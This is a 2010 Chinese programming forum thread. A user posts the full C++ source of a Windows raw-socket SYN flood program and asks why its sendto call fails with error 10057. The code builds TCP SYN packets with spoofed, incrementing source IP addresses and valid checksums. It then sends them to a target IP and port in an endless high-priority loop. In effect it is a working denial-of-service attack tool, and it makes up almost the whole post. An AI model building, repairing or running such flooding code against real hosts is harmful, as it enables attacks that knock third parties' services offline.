| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 615 人关注过本帖
标题:求助,那位大虾看看下面这段发包程序吧
取消只看楼主 加入收藏
aragorn_1024
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2010-7-30
结帖率:100%
收藏
已结贴  问题点数:20 回复次数:3 
求助,那位大虾看看下面这段发包程序吧
// synflood.cpp
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")
#define FAKE_IP "172.20.36.158"
#define SEQ 0x28376839
#define right "===============Coder Paris-ye====================\n"
USHORT checksum(USHORT *buffer, int size);
int flood();
typedef struct tcphdr
{
  USHORT th_sport;
  USHORT th_dport;
  unsigned int th_seq;
  unsigned int th_ack;
  unsigned char th_lenres;
  unsigned char th_flag;
  USHORT th_win;
  USHORT th_sum;
  USHORT th_urp;
}TCP_HEADER;
typedef struct iphdr
{
  unsigned char h_verlen;
  unsigned char tos;
  unsigned short total_len;
  unsigned short ident;
  unsigned short frag_and_flags;
  unsigned char ttl;
  unsigned char proto;
  unsigned short checksum;
  unsigned int sourceIP;
  unsigned int destIP;
}IP_HEADER;
struct
{
  unsigned long saddr;
  unsigned long daddr;
  char mbz;
  char ptcl;
  unsigned short tcpl;
}PSD_HEADER;
WSADATA wsaData;
SOCKET sockMain = (SOCKET) NULL;
int ErrorCode=0,flag=1,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
unsigned short activPort=40000;
struct sockaddr_in sockAddr;
TCP_HEADER tcpheader;
IP_HEADER   ipheader;
char     sendBuf[128];
USHORT checksum(USHORT *buffer, int size)
{
  unsigned long cksum=0;
  while(size >1)
  {
    cksum+=*buffer++;
    size-=sizeof(USHORT);
  }
  if(size) cksum+=*(UCHAR*)buffer;
    cksum=(cksum >> 16)+(cksum & 0xffff);
    cksum+=(cksum >>16);
  return (USHORT)(~cksum);
}

int main(int argc,char* argv[])
{
  int   portNum=0;
  DWORD dw;
  HANDLE hThread=NULL;
  char   putInfo;
  if(argc!=3)
  {
    printf("%s\n",right);
    printf("Invalid command,Pls use:\n%s <IP> <port>\nExample:%s 192.168.100.244 80",argv[0],argv[0]);
    return 1;
  }
  if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0)
  {
      printf("WSAStartup failed: %d\n",ErrorCode);
      return 2;
  }
  sockMain=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
  if(sockMain==INVALID_SOCKET)
  {
    printf("Socket failed: %d\n",WSAGetLastError());
    return 3;
  }
  ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
  if(ErrorCode==SOCKET_ERROR)
  {
      printf("Set sockopt failed: %d\n",WSAGetLastError());
      return 4;
  }
  ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
  if(ErrorCode==SOCKET_ERROR)
  {
      printf("Set sockopt time out failed: %d\n",WSAGetLastError());
      return 5;
  }
  portNum=atoi(argv[2]);
  memset(&sockAddr,0,sizeof(sockAddr));
  sockAddr.sin_family=AF_INET;
  sockAddr.sin_addr.s_addr =inet_addr(argv[1]);
  FakeIpNet=inet_addr(FAKE_IP);
  FakeIpHost=ntohl(FakeIpNet);
  ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
  ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
  ipheader.ident = 1;
  ipheader.frag_and_flags = 0;
  ipheader.ttl = 128;
  ipheader.proto = IPPROTO_TCP;
  ipheader.checksum =0;
  ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
  ipheader.destIP = inet_addr(argv[1]);
  tcpheader.th_dport=htons(portNum);
  tcpheader.th_sport = htons(portNum);
  tcpheader.th_seq = htonl(SEQ+SendSEQ);
  tcpheader.th_ack = 0;
  tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
  tcpheader.th_flag = 2;
  tcpheader.th_win = htons(16384);
  tcpheader.th_urp = 0;
  tcpheader.th_sum = 0;
  PSD_HEADER.saddr=ipheader.sourceIP;
  PSD_HEADER.daddr=ipheader.destIP;
  PSD_HEADER.mbz=0;
  PSD_HEADER.ptcl=IPPROTO_TCP;
  PSD_HEADER.tcpl=htons(sizeof(tcpheader));
  printf("%s\n",right);
  hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
  SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
  ResumeThread(hThread);
  printf("Warning[start]...........\nPress any key to stop!\n");
  putInfo=getchar();
  TerminateThread(hThread,0);
  WSACleanup();
  printf("\nStopd...........\n");
  return 0;
}
int flood()
{
  while(1)
  {
    if(SendSEQ++==65536) SendSEQ=1;
    if(activPort++==40010) activPort=1000;
    ipheader.checksum =0;
    ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
    tcpheader.th_seq = htonl(SEQ+SendSEQ);
    tcpheader.th_sport = htons(activPort);
    tcpheader.th_sum = 0;
    PSD_HEADER.saddr=ipheader.sourceIP;
    memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
    memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
    tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
    memcpy(sendBuf,&ipheader,sizeof(ipheader));
    memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
    memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
    dataSize=sizeof(ipheader)+sizeof(tcpheader);
    ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
    memcpy(sendBuf,&ipheader,sizeof(ipheader));
    ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
    if(ErrorCode==SOCKET_ERROR)
    {
      printf("\nCan't connect this IP!Pls check it.\n");
      ExitThread(1);
    }
// Sleep(1000);
  }
  return 0;
}
=======================================================================
编译没有问题,但是运行时出现Can't connect this IP!Pls check it,也就是说ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr))时出错,请问这是什么问题阿!
搜索更多相关主题的帖子: 发包 
2010-07-30 15:57
aragorn_1024
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2010-7-30
收藏
得分:0 
来人啊!
2010-07-30 16:04
aragorn_1024
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2010-7-30
收藏
得分:0 
回复 3楼 hao0716
用原始套接字不行么?
2010-07-30 20:39
aragorn_1024
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2010-7-30
收藏
得分:0 
使用WSAGetLastError()获得错误代码为10057,解释如下:
套接字尚未连接。若在一个尚未建立连接的“面向连接”套接字上发出数据收发请求,便会产生这样的错误。
===================================================
哪位大虾看一下阿!
2010-08-02 16:53
快速回复:求助,那位大虾看看下面这段发包程序吧
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.018306 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved